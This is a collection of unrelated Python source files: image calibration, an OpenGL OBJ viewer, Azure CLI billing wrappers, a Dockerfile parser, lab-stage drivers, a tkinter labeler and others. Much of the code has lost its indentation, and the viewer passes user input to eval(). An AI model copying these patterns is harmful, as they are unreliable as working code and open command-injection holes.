cbias = np.array([im.extractChannel(Color.GREEN) for im in bias])
cflats = np.array([im.extractChannel(Color.GREEN) for im in flats])
cdarks = np.array([im.extractChannel(Color.GREEN) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesG = clights
if(blue):
clights = np.array([im.extractChannel(Color.BLUE) for im in lights])
cbias = np.array([im.extractChannel(Color.BLUE) for im in bias])
cflats = np.array([im.extractChannel(Color.BLUE) for im in flats])
cdarks = np.array([im.extractChannel(Color.BLUE) for im in darks])
calibrate(clights, cbias, cdarks, cflats)
imagesB = clights
for im in np.concatenate((imagesR, imagesG, imagesB)):
im.binImage(binX, binY)
return (imagesR, imagesG, imagesB)
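# Hedged usage sketch (the path is a placeholder; the subdirectory names come from the __listraw calls above):
# imagesR, imagesG, imagesB = sort("/data/session01", green=True, binX=2)
# expects Light_frames/, Bias_frames/, Dark_frames/ and Flat_fields/ under the given path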
|
# -*- coding: utf-8 -*-
# pragma pylint: disable=unused-argument, no-self-use, line-too-long
"""Tests using pytest_resilient_circuits"""
from __future__ import print_function
import pytest
from fn_cve_search.util.selftest import selftest_function
class TestCVESearch:
opts = {
"fn_cve_search": {
"max_results_display": 50,
"cve_base_url": "https://cve.circl.lu/api"
}
}
@pytest.mark.livetest
def test_cs_device_id_not_defined(self):
result = selftest_function(TestCVESearch.opts)
assert (result['state'] == "Success")
|
import argparse
import math
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
width = 500
height = 500
viewpoint = []
H = 0
scale = 2
points = []
polygons = []
window: GLint
def center_and_scale_model():
x = [point[0].value for point in points]
y = [point[1].value for point in points]
z = [point[2].value for point in points]
maxx = max(x)
minx = min(x)
maxy = max(y)
miny = min(y)
maxz = max(z)
minz = min(z)
div = max([maxx - minx, maxy - miny, maxz - minz])
for point in points:
point[0] = GLfloat(((point[0].value - (minx + maxx)/2)) * (scale/div))
point[1] = GLfloat(((point[1].value - (miny + maxy)/2)) * (scale/div))
point[2] = GLfloat(((point[2].value - (minz + maxz)/2)) * (scale/div))
def multiply_array_of_matrices(matrices):
result = matrices[0]
for i in range(1, len(matrices)):
X = result
Y = matrices[i]
result = [[sum(a*b for a,b in zip(X_row,Y_col)) for Y_col in zip(*Y)] for X_row in X]
return result
def get_transformation_matrix():
global points
global H
model_center = [0 - viewpoint[0], 0 - viewpoint[1], 0 - viewpoint[2]]
t1 = [[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [model_center[0], model_center[1], model_center[2], 1]]
sinalpha = model_center[1] / (math.sqrt(model_center[0] ** 2 + model_center[1] ** 2))
cosalpha = model_center[0] / (math.sqrt(model_center[0] ** 2 + model_center[1] ** 2))
model_center = [math.sqrt(model_center[0] ** 2 + model_center[1] ** 2), 0, model_center[2]]
t2 = [[cosalpha, -sinalpha, 0, 0], [sinalpha, cosalpha, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
sinbeta = model_center[0] / (math.sqrt(model_center[0] ** 2 + model_center[2] ** 2))
cosbeta = model_center[2] / (math.sqrt(model_center[0] ** 2 + model_center[2] ** 2))
model_center = [0, 0, math.sqrt(model_center[0] ** 2 + model_center[2] ** 2)]
t3 = [[cosbeta, 0, sinbeta, 0], [0, 1, 0, 0], [-sinbeta, 0, cosbeta, 0], [0, 0, 0, 1]]
H = model_center[2]
t4 = [[0, -1, 0, 0], [1, 0, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
t5 = [[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]
return multiply_array_of_matrices([t1, t2, t3, t4, t5])
def myReshape(width, height):
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glClearColor(1.0, 1.0, 1.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
glPointSize(1.0)
glColor3f(0.0, 0.0, 0.0)
def myDisplay():
center_and_scale_model()
transform_matrix = get_transformation_matrix()
transformed_points = []
#Transforming points
for i in range(len(points)):
transformed_point = [part.value for part in points[i]]
transformed_point.append(1.0)
transformed_point = multiply_array_of_matrices([[transformed_point], transform_matrix])[0]
draw_point = [transformed_point[0]/transformed_point[2] * H, transformed_point[1]/transformed_point[2] * H]
draw_point = [GLfloat(part) for part in draw_point]
transformed_points.append(draw_point)
#Drawing points
for polygon in polygons:
glBegin(GL_LINE_LOOP)
glVertex2f(transformed_points[polygon[0]][0], transformed_points[polygon[0]][1])
glVertex2f(transformed_points[polygon[1]][0], transformed_points[polygon[1]][1])
glVertex2f(transformed_points[polygon[2]][0], transformed_points[polygon[2]][1])
glEnd()
glFlush()
def parse_args():
parser = argparse.ArgumentParser(description='Draws 3d model from object file')
parser.add_argument('object_file', help='path to object file')
parser.add_argument('viewpoint', help='viewpoint (x, y, z)')
args = parser.parse_args()
return args
def read_file(object_file):
global points, polygons
with open(object_file, 'r') as inp:
for line in inp:
            if line.startswith('v '):
line = line.strip().split(' ')
points.append([GLfloat(float(line[1])), GLfloat(float(line[2])), GLfloat(float(line[3]))])
            elif line.startswith('f '):
line = line.strip().split(' ')
polygons.append([int(line[1]) - 1, int(line[2]) - 1, int(line[3]) - 1])
def check_point(point):
x = point[0]
y = point[1]
z = point[2]
for polygon in polygons:
x1 = points[polygon[0]][0].value
x2 = points[polygon[1]][0].value
x3 = points[polygon[2]][0].value
y1 = points[polygon[0]][1].value
y2 = points[polygon[1]][1].value
y3 = points[polygon[2]][1].value
z1 = points[polygon[0]][2].value
z2 = points[polygon[1]][2].value
z3 = points[polygon[2]][2].value
A = (y2 - y1) * (z3 - z1) - (z2 - z1) * (y3 - y1)
B = -1 * (x2 - x1) * (z3 - z1) + (z2 - z1) * (x3 - x1)
C = (x2 - x1) * (y3 - y1) - (y2 - y1) * (x3 - x1)
D = -1 * x1 * A - y1 * B - z1 * C
VR = A*x + B*y + C*z + D
if VR >= 0:
return False
return True
def myKeyboard(theKey, mouseX, mouseY):
global viewpoint, scale
theKey = theKey.decode().lower()
if theKey == 'w':
viewpoint[1] += .1
elif theKey == 's':
viewpoint[1] -= .1
elif theKey == 'd':
viewpoint[0] += .1
elif theKey == 'a':
viewpoint[0] -= .1
elif theKey == 'g':
viewpoint[2] += .1
elif theKey == 'f':
viewpoint[2] -= .1
elif theKey == '+':
scale += .1
elif theKey == '-':
if scale > .1:
scale -= .1
else:
return
print('New viewpoint is:')
print(viewpoint)
myReshape(width, height)
myDisplay()
def main():
global window, viewpoint
args = parse_args()
read_file(args.object_file)
viewpoint = list(eval(args.viewpoint))
while check_point(viewpoint):
print('Viewpoint is inside model, choose another one')
viewpoint = list(eval(input('Viewpoint (x, y, z): ')))
print("Observation point is calculated as the center of the model (0, 0, 0 since model will be centered)")
print('Use "a" to decrease viewpoint x value and "d" to increase x value')
print('Use "s" to decrease viewpoint y value and "w" to increase y value')
print('Use "f" to decrease viewpoint z value and "g" to increase z value')
print('Use "-" to zoom out and "+" to zoom in')
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(width, height)
glutInitWindowPosition(100, 100)
glutCreateWindow("Glut OpenGL 3d object")
glutReshapeFunc(myReshape)
glutKeyboardFunc(myKeyboard)
glutDisplayFunc(myDisplay)
glutMainLoop()
if __name__ == "__main__":
main()
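# Hedged invocation example (the file name is a placeholder):
#   python render_obj.py model.obj "(0.5, 0.5, 3.0)"
# The second argument is eval()'d into the (x, y, z) viewpoint; w/s, a/d and f/g move it, +/- zoom.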
|
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def list(period_start_date, period_end_date, account_name=None, profile_name=None):
params = get_params(locals())
command = "az billing invoice list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def show(name, account_name=None, by_subscription=None):
params = get_params(locals())
command = "az billing invoice show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
def download(account_name=None, invoice_name=None, download_token=None, download_urls=None):
params = get_params(locals())
command = "az billing invoice download " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        raise Exception(stderr)
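# Hedged usage sketch (dates and account name are placeholders; a logged-in Azure CLI is assumed):
# invoices = list(period_start_date="2021-01-01", period_end_date="2021-06-30", account_name="my-billing-account")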
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
-----------------File Info-----------------------
Name: function.py
Description: save code that frequently used
Author: GentleCP
Email: 574881148@qq.com
WebSite: https://www.gentlecp.com
Create Date: 3/24/2021
-----------------End-----------------------------
"""
from math import ceil
def is_unique(seq):
'''
    judge whether a given sequence has repeating elements or not
Args:
seq: sequence like list, tuple and so on.
Returns: True if unique and False if not unique
'''
return len(seq) == len(set(seq))
def chunk_list(lst: list, size: int):
'''
    split a list into chunks by specifying the chunk size
e.g. [1,2,3,4,5] -> [[1,2], [3,4], [5]]
Args:
lst: [1,2,3,4,5]
        size: 2
Returns: chunk_list, e.g. [[1,2], [3,4], [5]]
'''
return map(lambda x: lst[x * size: x * size + size], list(range(0, ceil(len(lst) / size))))
def flatten_seq(seq):
'''
flatten a deep sequence into a single one
e.g. [[1,2],[[3,4]],5] -> [1,2,3,4,5]
Args:
seq: sequence, could be list or tuple...
Returns:
'''
for item in seq:
try:
for subitem in flatten_seq(item):
yield subitem
except TypeError:
yield item
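# Hedged demo (not part of the original module) exercising the helpers above:
if __name__ == '__main__':
    print(is_unique([1, 2, 3]))                      # True
    print(list(chunk_list([1, 2, 3, 4, 5], 2)))      # [[1, 2], [3, 4], [5]]
    print(list(flatten_seq([[1, 2], [[3, 4]], 5])))  # [1, 2, 3, 4, 5]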
|
import logging
import os
from dockermake.dockerfile.instructions import Keywords
from dockermake.dockerfile.instructions import InstructionFactory
from dockermake.lint.linter import DockerfileLint
from dockermake.dockerfile.logical_line_extractor import LogicalLineExtractor
class Dockerfile:
def __init__(self):
self.path = None
self.physical_lines = list()
self.logical_lines = list()
self.instructions = list()
self.stages = list()
@staticmethod
def load(working_directory_path, dockerfile_name):
dockerfile_path = os.path.join(working_directory_path, dockerfile_name)
return Dockerfile.load_from_file_path(dockerfile_path)
@staticmethod
def load_from_file_path(dockerfile_path):
if not os.path.isfile(dockerfile_path):
raise Exception("Dockerfile not found at %s" % dockerfile_path)
with open(dockerfile_path, 'r', encoding='UTF-8') as dockerfile:
context = dockerfile.read()
logging.debug("Read dockerfile from: %s", dockerfile_path)
dockerfile = Dockerfile._parse(context)
dockerfile.path = dockerfile_path
return dockerfile
@staticmethod
def _parse(context):
dockerfile = Dockerfile()
dockerfile.physical_lines = context.splitlines()
dockerfile.logical_lines = LogicalLineExtractor.parse_dockerfile(context)
dockerfile.instructions = Dockerfile._create_instructions_from_logical_lines(dockerfile.logical_lines)
dockerfile.stages = Dockerfile._set_stage_names_from_instructions(dockerfile.instructions)
logging.debug("Dockerfile instructions successfully parsed: %s", dockerfile.instructions)
return dockerfile
@staticmethod
def _create_instructions_from_logical_lines(logical_lines):
instructions = list()
for logical_line, according_physical_line in logical_lines:
keyword, argument = logical_line.split(' ', 1)
if keyword in Keywords.list:
instruction = InstructionFactory.create_from_keyword(
keyword, argument, according_physical_line
)
instructions.append(instruction)
else:
raise Exception("Unknown instruction in Dockerfile: %s" % keyword)
return instructions
@staticmethod
def _set_stage_names_from_instructions(instructions):
stages = list()
stage_index = -1
stage = None
for instruction in instructions:
if instruction.get_type() == Keywords.FROM:
stage_index += 1
if instruction.stage_name:
stage = instruction.stage_name
else:
stage = stage_index
stages.append(stage)
elif stage is None:
logging.debug("Dockerfile did not start with a FROM instruction, stage -1 exists")
stage = stage_index
stages.append(stage_index)
instruction.stage = stage
return stages
def lint(self, exit_on_errors, exclude):
DockerfileLint(self, exit_on_errors, exclude).lint()
def get_physical_lines(self):
return self.physical_lines
def get_last_stage(self):
return self.stages[-1]
def get_instructions(self, stage=None):
instructions = list()
for instruction in self.instructions:
if stage is None or instruction.stage == stage:
instructions.append(instruction)
return instructions
def get_instructions_of_type(self, instruction_type, stage=None):
instructions = list()
for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == instruction_type:
instructions.append(instruction)
return instructions
def get_first_instruction_of_type(self, instruction_type, stage=None):
for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == instruction_type:
return instruction
return None
def get_maintainer_labels(self, ignore_case, stage=None):
instructions = list()
for instruction in self.get_instructions(stage=stage):
if instruction.get_type() == Keywords.LABEL and instruction.contains("maintainer", ignore_case):
instructions.append(instruction)
return instructions
def get_last_index_of(self, instruction_type, stage=None):
last_index = -1
for index, instruction in enumerate(self.instructions):
if stage is None or instruction.stage == stage:
if instruction.get_type() == instruction_type:
last_index = index
return last_index
def get_instruction_count(self, stage=None):
return len(self.get_instructions(stage=stage))
def contains_arg_with_name(self, name):
"""Returns true if arg is part of one of all instructions"""
return name in set(instruction.name for instruction in self.get_instructions_of_type(Keywords.ARG))
def __str__(self):
        return self.path if self.path else "Dockerfile without path"
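# Illustrative usage sketch (not part of the original module); the Dockerfile
# path below is a placeholder.
if __name__ == "__main__":
    dockerfile = Dockerfile.load_from_file_path("./Dockerfile")
    print("Stages:", dockerfile.stages)
    for from_instruction in dockerfile.get_instructions_of_type(Keywords.FROM):
        print("FROM instruction:", from_instruction)
    last_stage = dockerfile.get_last_stage()
    print("Instructions in last stage:", dockerfile.get_instruction_count(stage=last_stage))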
|
"""
Escreva um programa que pergunte a quantidade de Km percorridos por um carro alugado
e a quantidade de dias pelos quais ele foi alugado. Calcule o preço a pagar,
sabendo que o carro custa R$ 60 por dia e R$ 0,15 por Km rodado.
"""
# entrada de dados
km_percorrido = float(input('Digite a quantidade de quilometros percorridos por um carro: '))
dias_alugado = int(input('O carro foi alugado por quantos dias? '))
# cálculo dos valores
total_km = km_percorrido * 0.15
total_dias = dias_alugado * 60
total_gasto = total_km + total_dias
print(f'You spent R$ {total_gasto:.2f} in total: R$ {total_km:.2f} for the kilometers driven and R$ {total_dias:.2f} for the rental days.')
|
import logging
import os
import socket
from aiohttp import AsyncResolver, ClientSession, TCPConnector
from datetime import datetime
from discord.ext import commands
logger = logging.getLogger(__name__)
# All the cogs that are to be loaded on launch
cogs = ['bot.cogs.base',]
class DTSBot(commands.Bot):
def __init__(self):
super().__init__(command_prefix="!",
description='DTS Apprentice Made Bot!')
async def on_ready(self):
self.http_session = ClientSession(
connector=TCPConnector(resolver=AsyncResolver(), family=socket.AF_INET)
)
for cog in cogs:
try:
self.load_extension(cog)
except Exception as e:
logger.error(f'Failed to load extension: {cog}\n{e}')
print(f'Client Logged in at {datetime.now()}')
print(f'Logged in as : {self.user.name}')
print(f'ID : {self.user.id}')
def run(self):
super().run(os.environ.get('TOKEN'), reconnect=True)
if __name__ == '__main__':
bot = DTSBot()
bot.run()
|
# -*- coding: utf-8 -*-
import time
import numpy as np
from PyQt4 import QtGui, QtCore
from ..Stage import Stage, MoveFuture, StageInterface
from acq4.drivers.Scientifica import Scientifica as ScientificaDriver
from acq4.util.Mutex import Mutex
from acq4.util.Thread import Thread
from acq4.pyqtgraph import debug, ptime, SpinBox
class Scientifica(Stage):
"""
A Scientifica motorized device.
This class supports PatchStar, MicroStar, SliceScope, objective changers, etc.
The device may be identified either by its serial port or by its description
string:
port: <serial port> # eg. 'COM1' or '/dev/ttyACM0'
name: <string> # eg. 'SliceScope' or 'MicroStar 2'
baudrate: <int> # may be 9600 or 38400
The optional 'baudrate' parameter is used to set the baudrate of the device.
Both valid rates will be attempted when initially connecting.
"""
def __init__(self, man, config, name):
        # the device may be identified either by serial port or by name
port = config.pop('port', None)
name = config.pop('name', None)
self.scale = config.pop('scale', (1e-6, 1e-6, 1e-6))
baudrate = config.pop('baudrate', None)
ctrl_version = config.pop('version', 2)
try:
self.dev = ScientificaDriver(port=port, name=name, baudrate=baudrate, ctrl_version=ctrl_version)
except RuntimeError as err:
if hasattr(err, 'dev_version'):
                raise RuntimeError(str(err) + " You must add `version=%d` to the configuration for this device and double-check any speed/acceleration parameters." % int(err.dev_version))
else:
raise
# Controllers reset their baud to 9600 after power cycle
if baudrate is not None and self.dev.getBaudrate() != baudrate:
self.dev.setBaudrate(baudrate)
self._lastMove = None
man.sigAbortAll.connect(self.abort)
Stage.__init__(self, man, config, name)
# clear cached position for this device and re-read to generate an initial position update
self._lastPos = None
self.getPosition(refresh=True)
# Set approach angle
# Disabled--this toggles the approach bit and we can't reconfigure it from here :(
# approach = self.dev.send('APPROACH')
# self.dev.send('ANGLE %f' % self.pitch)
# self.dev.send('APPROACH %s' % approach) # reset approach bit; setting angle enables it
# set any extra parameters specified in the config
params = config.get('params', {})
for param, val in params.items():
if param == 'currents':
assert len(val) == 2
self.dev.setCurrents(*val)
elif param == 'axisScale':
assert len(val) == 3
for i, x in enumerate(val):
self.dev.setAxisScale(i, x)
else:
self.dev.setParam(param, val)
self.setUserSpeed(config.get('userSpeed', self.dev.getSpeed() * abs(self.scale[0])))
# whether to monitor for changes to a MOC
self.monitorObj = config.get('monitorObjective', False)
if self.monitorObj is True:
if self.dev._version < 3:
raise TypeError("Scientifica motion card version %s does not support reading objective position." % self.dev._version)
self.objectiveState = None
self._checkObjective()
# thread for polling position changes
self.monitor = MonitorThread(self, self.monitorObj)
self.monitor.start()
def capabilities(self):
"""Return a structure describing the capabilities of this device"""
if 'capabilities' in self.config:
return self.config['capabilities']
else:
return {
'getPos': (True, True, True),
'setPos': (True, True, True),
'limits': (False, False, False),
}
def stop(self):
"""Stop the manipulator immediately.
"""
with self.lock:
self.dev.stop()
if self._lastMove is not None:
self._lastMove._stopped()
self._lastMove = None
def abort(self):
"""Stop the manipulator immediately.
"""
self.dev.stop()
if self._lastMove is not None:
self._lastMove._stopped()
self._lastMove = None
def setUserSpeed(self, v):
"""Set the maximum speed of the stage (m/sec) when under manual control.
The stage's maximum speed is reset to this value when it is not under
programmed control.
"""
self.userSpeed = v
self.dev.setSpeed(v / abs(self.scale[0]))
def _getPosition(self):
# Called by superclass when user requests position refresh
with self.lock:
pos = self.dev.getPos()
pos = [pos[i] * self.scale[i] for i in (0, 1, 2)]
if pos != self._lastPos:
self._lastPos = pos
emit = True
else:
emit = False
if emit:
# don't emit signal while locked
self.posChanged(pos)
return pos
def targetPosition(self):
with self.lock:
if self._lastMove is None or self._lastMove.isDone():
return self.getPosition()
else:
return self._lastMove.targetPos
def quit(self):
self.monitor.stop()
Stage.quit(self)
def _move(self, abs, rel, speed, linear):
with self.lock:
if self._lastMove is not None and not self._lastMove.isDone():
self.stop()
pos = self._toAbsolutePosition(abs, rel)
speed = self._interpretSpeed(speed)
self._lastMove = ScientificaMoveFuture(self, pos, speed, self.userSpeed)
return self._lastMove
def deviceInterface(self, win):
return ScientificaGUI(self, win)
def startMoving(self, vel):
"""Begin moving the stage at a continuous velocity.
"""
s = [int(-v * 1000. / 67. / self.scale[i]) for i,v in enumerate(vel)]
print(s)
self.dev.send('VJ %d %d %d C' % tuple(s))
def _checkObjective(self):
with self.lock:
obj = int(self.dev.send('obj'))
if obj != self.objectiveState:
self.objectiveState = obj
self.sigSwitchChanged.emit(self, {'objective': obj})
def getSwitch(self, name):
if name == 'objective' and self.monitorObj:
return self.objectiveState
else:
return Stage.getSwitch(self, name)
class MonitorThread(Thread):
"""Thread to poll for manipulator position changes.
"""
def __init__(self, dev, monitorObj):
self.dev = dev
self.lock = Mutex(recursive=True)
self.monitorObj = monitorObj
self.stopped = False
self.interval = 0.3
Thread.__init__(self)
def start(self):
self.stopped = False
Thread.start(self)
def stop(self):
with self.lock:
self.stopped = True
def setInterval(self, i):
with self.lock:
self.interval = i
def run(self):
minInterval = 100e-3
interval = minInterval
lastPos = None
while True:
try:
with self.lock:
if self.stopped:
break
maxInterval = self.interval
pos = self.dev._getPosition() # this causes sigPositionChanged to be emitted
if pos != lastPos:
# if there was a change, then loop more rapidly for a short time.
interval = minInterval
lastPos = pos
else:
interval = min(maxInterval, interval*2)
if self.monitorObj is True:
self.dev._checkObjective()
time.sleep(interval)
except:
debug.printExc('Error in Scientifica monitor thread:')
time.sleep(maxInterval)
class ScientificaMoveFuture(MoveFuture):
"""Provides access to a move-in-progress on a Scientifica manipulator.
"""
def __init__(self, dev, pos, speed, userSpeed):
MoveFuture.__init__(self, dev, pos, speed)
self._interrupted = False
        self._errorMsg = None
self._finished = False
pos = np.array(pos) / np.array(self.dev.scale)
with self.dev.dev.lock:
self.dev.dev.moveTo(pos, speed / abs(self.dev.scale[0]))
# reset to user speed immediately after starting move
# (the move itself will run with the previous speed)
self.dev.dev.setSpeed(userSpeed / abs(self.dev.scale[0]))
def wasInterrupted(self):
"""Return True if the move was interrupted before completing.
"""
return self._interrupted
def isDone(self):
"""Return True if the move is complete.
"""
return self._getStatus() != 0
def _getStatus(self):
# check status of move unless we already know it is complete.
# 0: still moving; 1: finished successfully; -1: finished unsuccessfully
if self._finished:
if self._interrupted:
return -1
else:
return 1
if self.dev.dev.isMoving():
# Still moving
return 0
# did we reach target?
pos = self.dev._getPosition()
dif = ((np.array(pos) - np.array(self.targetPos))**2).sum()**0.5
if dif < 2.5e-6:
# reached target
self._finished = True
return 1
else:
# missed
self._finished = True
self._interrupted = True
self._errorMsg = "Move did not complete (target=%s, position=%s, dif=%s)." % (self.targetPos, pos, dif)
return -1
def _stopped(self):
# Called when the manipulator is stopped, possibly interrupting this move.
status = self._getStatus()
if status == 1:
# finished; ignore stop
return
elif status == -1:
self._errorMsg = "Move was interrupted before completion."
elif status == 0:
# not actually stopped! This should not happen.
raise RuntimeError("Interrupted move but manipulator is still running!")
else:
raise Exception("Unknown status: %s" % status)
def errorMessage(self):
return self._errorMsg
class ScientificaGUI(StageInterface):
def __init__(self, dev, win):
StageInterface.__init__(self, dev, win)
# Insert Scientifica-specific controls into GUI
self.zeroBtn = QtGui.QPushButton('Zero position')
self.layout.addWidget(self.zeroBtn, self.nextRow, 0, 1, 2)
self.nextRow += 1
self.psGroup = QtGui.QGroupBox('Rotary Controller')
self.layout.addWidget(self.psGroup, self.nextRow, 0, 1, 2)
self.nextRow += 1
self.psLayout = QtGui.QGridLayout()
self.psGroup.setLayout(self.psLayout)
self.speedLabel = QtGui.QLabel('Speed')
self.speedSpin = SpinBox(value=self.dev.userSpeed, suffix='m/turn', siPrefix=True, dec=True, bounds=[1e-6, 10e-3])
self.psLayout.addWidget(self.speedLabel, 0, 0)
self.psLayout.addWidget(self.speedSpin, 0, 1)
self.zeroBtn.clicked.connect(self.dev.dev.zeroPosition)
self.speedSpin.valueChanged.connect(lambda v: self.dev.setDefaultSpeed(v))
|
# import gi
import os
import csv
# gi.require_version('Gtk', '3.0')
# from gi.repository import Gtk, Gdk
# from gi.repository import GdkPixbuf
import tkinter as tk
from tkinter import filedialog, StringVar
from PIL import Image, ImageTk
class SingleView(tk.Frame):
def __init__(self, master=None):
if not os.path.exists("labels.csv"):
with open("labels.csv", "w") as l:
writer = csv.DictWriter(l, ["filename", "label"])
writer.writeheader()
super().__init__(master)
self.pack()
self.img_dir = ""
self.root_dir = ""
self.entry_text = StringVar()
self.current_files = []
self.available_dirs = []
self.img_index = 0
self.folder_index = 0
self.progress = self.restore_from_file()
self.welcome_label = tk.Label(self,
text="Click Choose Directory and select the directory containing the images to be labeled")
self.img = tk.Label(self, image=None)
self.entry = tk.Entry(self, textvariable=self.entry_text)
self.entry.bind("<Return>", self.on_submit_entry)
self.select_folder_btn = tk.Button(self, command=self.on_folder_clicked, text="Select Folder")
prev_btn = tk.Button(self, command=self.prev_img, text="Previous Image")
submit = tk.Button(self, command=self.on_submit, text="Submit")
submit.bind("<Return>", self.on_submit)
self.grid(column=0, row=0, columnspan=3, rowspan=6)
self.welcome_label.grid(column=0, row=0, columnspan=3, rowspan=1)
self.img.grid(column=0, row=1, columnspan=3, rowspan=2)
self.entry.grid(column=0, row=4, columnspan=3, rowspan=1)
self.select_folder_btn.grid(column=0, row=5, columnspan=1, rowspan=1)
prev_btn.grid(column=1, row=5, columnspan=1, rowspan=1)
submit.grid(column=2, row=5, columnspan=1, rowspan=1)
def prev_img(self):
self.img_index -= 2
if self.img_index < 0:
self.img_index = 0
self.folder_index -= 2
if self.folder_index < 0:
self.folder_index = 0
return
self.move_to_next_folder()
self.update_img()
with open("labels.csv", "a+") as csv_file:
# Taken from https://stackoverflow.com/a/10289740
# Move the pointer (similar to a cursor in a text editor) to the end of the file.
csv_file.seek(0, os.SEEK_END)
            # Skip the very last character in the file: if the final line is
            # empty, remove both it and the line before it.
pos = csv_file.tell() - 1
# Read each character in the file one at a time from the penultimate
# character going backwards, searching for a newline character
# If we find a new line, exit the search
while pos > 0 and csv_file.read(1) != "\n":
pos -= 1
csv_file.seek(pos, os.SEEK_SET)
# So long as we're not at the start of the file, delete all the characters ahead of this position
if pos > 0:
# Skips the \n character
pos += 1
# Truncate the file after \n
csv_file.seek(pos, os.SEEK_SET)
csv_file.truncate()
@staticmethod
def restore_from_file():
done_dict = {}
with open("labels.csv", "r") as prog:
reader = csv.DictReader(prog)
for row in reader:
done_dict[row["filename"]] = True
folder = row["filename"]
folder = folder.split(os.path.sep)[:-1]
folder = os.path.sep.join(folder)
done_dict[folder] = True
return done_dict
def on_submit_entry(self, a):
self.on_submit()
def on_submit(self):
with open("labels.csv", "a+") as labels:
writer = csv.DictWriter(labels, ["filename", "label"])
try:
writer.writerow({"filename": self.current_files[self.img_index], "label": self.entry_text.get()})
self.entry_text.set("")
self.update_img()
except IndexError as e:
self.move_to_next_folder()
def update_img(self):
self.img_index += 1
path = self.current_files[self.img_index]
if path not in self.progress:
try:
tmp_img = ImageTk.PhotoImage(Image.open(path))
self.img.configure(image=tmp_img)
self.img.image = tmp_img
self.welcome_label["text"] = path
except Exception as e:
print(e)
else:
self.update_img()
def select_files(self, folder):
self.current_files = [os.path.join(folder, f) for f in os.listdir(folder) if
os.path.isfile(os.path.join(folder, f))]
def get_dirs(self, folder):
self.available_dirs = [os.path.join(folder, f) for f in os.listdir(folder) if
os.path.isdir(os.path.join(folder, f))]
def on_folder_clicked(self):
self.img_dir = filedialog.askdirectory()
if self.img_dir == "":
return
# Have to replace all of the "/" because tkinter only returns a path containing them
components = self.img_dir.split("/")
if os.path.sep == "\\":
components[0] += "\\"
else:
components[0] = "/"
self.img_dir = ""
for i in components:
self.img_dir = os.path.join(self.img_dir, i)
try:
self.get_dirs(self.img_dir)
self.select_files(self.img_dir)
self.update_img()
except IndexError as e:
self.move_to_next_folder()
def move_to_next_folder(self):
self.folder_index += 1
try:
self.img_dir = self.available_dirs[self.folder_index]
if self.img_dir not in self.progress:
self.select_files(self.img_dir)
self.img_index = 0
self.update_img()
else:
self.move_to_next_folder()
except IndexError:
            self.welcome_label["text"] = "Click submit again; if there are no new images, you are done with the selected directory!"
if __name__ == '__main__':
root = tk.Tk()
window = SingleView(master=root)
window.mainloop()
|
"""
This code is taken from PyPi stream_service package
https://github.com/BR1py/stream_service
"""
from __future__ import absolute_import
from .helpers import *
from . import frame
from . import rpc
from . import buffer
|
"""
Conditionals 2.
We extend the language of conditionals from the previous
example by adding the keyword "else". This allows conditionals
to ask two or more sequential questions, each with a different
action.
"""
size(640, 360)
background(0)
for i in range(2, width - 2, 2):
# If 'i' divides by 20 with no remainder
if i % 20 == 0:
stroke(255)
line(i, 80, i, height / 2)
# If 'i' divides by 10 with no remainder
elif i % 10 == 0:
stroke(153)
line(i, 20, i, 180)
# If neither of the above two conditions are met
# then draw this line
else:
stroke(102)
line(i, height / 2, i, height - 20)
|
#!/usr/bin/env python
from distutils.core import setup
# setup options
setup(
name='core',
author='Zach Panzarino',
version='1.0.0',
platforms='ANY',
packages=['core'],
)
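# Illustrative usage (not part of the original file): from the project root,
#     python setup.py sdist      # build a source distribution
#     python setup.py install    # install the 'core' package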
|
import os.path as osp
import numpy as np
from shutil import copyfile
from typing import Optional
import time
import json
import logging
import torch
from omegaconf import DictConfig, OmegaConf
from hydra.utils import instantiate
import torch.nn.functional as F
from terminaltables.ascii_table import AsciiTable
import wandb
import retinal.data.test_augment as ta
from retinal.modeling import CompoundLoss
from retinal.evaluation import MultiClassEvaluator, AverageMeter, LossMeter
from retinal.utils import round_dict, get_lr
from retinal.utils.checkpoint import load_checkpoint
logger = logging.getLogger(__name__)
class DRTester:
def __init__(self, cfg: DictConfig) -> None:
self.cfg = cfg
self.work_dir = self.cfg.work_dir
self.device = torch.device(self.cfg.device)
self.build_data_loader()
self.build_model(self.cfg.test.checkpoint)
self.build_meter()
self.init_wandb_or_not()
def init_wandb_or_not(self):
if self.cfg.wandb.enable:
wandb.init(
project=self.cfg.wandb.project,
entity=self.cfg.wandb.entity,
config=OmegaConf.to_container(self.cfg, resolve=True),
tags=self.cfg.wandb.tags.split(","),
)
wandb.run.name = "{}-test-{}-{}".format(
wandb.run.id, self.cfg.model.name, self.cfg.data.name
)
wandb.run.save()
wandb.watch(self.model, log=None)
logger.info("Wandb initialized : {}".format(wandb.run.name))
def build_data_loader(self) -> None:
# data pipeline
self.test_loader = instantiate(self.cfg.data.object.test_ta)
def build_model(self, checkpoint: Optional[str] = "") -> None:
self.model = instantiate(self.cfg.model.object)
self.model.to(self.device)
logger.info("Model initialized")
self.checkpoint_path = osp.join(
self.work_dir, "best.pth" if checkpoint == "" else checkpoint
)
